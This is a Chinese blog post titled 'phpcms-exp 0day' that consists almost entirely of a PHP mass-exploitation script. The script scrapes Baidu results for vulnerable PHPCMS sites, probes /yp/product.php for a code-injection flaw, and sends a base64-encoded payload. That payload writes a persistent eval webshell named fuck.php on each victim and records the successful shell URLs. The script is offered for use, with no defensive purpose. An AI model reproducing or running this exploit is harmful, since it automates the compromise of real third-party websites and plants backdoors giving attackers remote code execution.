phpcms-exp 0day

分类:安全 | 2012-03-9 | 撸过 158 次
0人扯谈
<?php
error_reporting(E_ERROR);
set_time_limit(0);

$keyword=’inurl:about/joinus’ ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file(‘url.txt’);
if (in_array(“$url\r\n”,$url_list)){
echo “[-] Links repeat\n”;
}else{
$fp = @fopen(‘url.txt’, ‘a’);
@fwrite($fp, $url.”\r\n”);
@fclose($fp);
print_r(”
[-] Get …… $url\r\n”);
if(okbug($url)){
$exploit=exploit($url);

$ors=okor($url);
if ($ors){
echo “
  • Shell:-> “.$url.”/yp/fuck.php\n”; $fp = @fopen(‘shell.txt’, ‘a’); @fwrite($fp, $url.”/yp/fuck.php\r\n”); @fclose($fp); } }else{ print “[-] No Bug!\n”; } } } } function exploit($url){ $host=$url; $port=”80″; $content =’a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7′; $data = ‘POST /yp/product.php?pagesize=${${@eval%28$_POST[a]%29}} HTTP/1.1′.”\r\n”; $data .= “X-Forwarded-For: 199.1.88.29\r\n”; $data .= “Referer: http://$host\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n”; $data .= “Host: $host\r\n”; $data .= “Content-Length: “.strlen($content).”\r\n”; $data .= “Cache-Control: no-cache\r\n\r\n”; $data .= $content.”\r\n”; $ock=fsockopen($host,$port); if (!$ock) { echo “
  • No response from $host\n”; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } function okor($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,”GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if (strpos($data, ’200′) !== false) { return true; }else{ return false; } } function okbug($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,’GET /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1′.”\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if(preg_match(‘/(php.ini)/i’,$data)) { return true; }else{ return false; } } function ReadBaiduList($keyword,$timeout,$nowpage) { $tmp = array(); //$data = ”; $nowpage = ($nowpage-1)*10; $fp = @fsockopen(‘www.baidu.com’,80,$errno,$errstr,$timeout); @fputs($fp,”GET /s?wd=”.urlencode($keyword).”&pn=”.$nowpage.” HTTP/1.1\r\nHost:www.baidu.com\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 1024); @fclose($fp); preg_match_all(“/\}\)\” href\=\”http\:\/\/([^~]*?)\” target\=\”\_blank\”/i”,$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode(‘/’,$tmp[1][$i]); $array[] = str_replace(‘http://’,”,$row[0]); } return $array; } ?>
本站内容均为原创,转载请务必保留署名与链接!
phpcms-exp 0day:https://www.webshell.cc/3333.html
标签: , ,

相关日志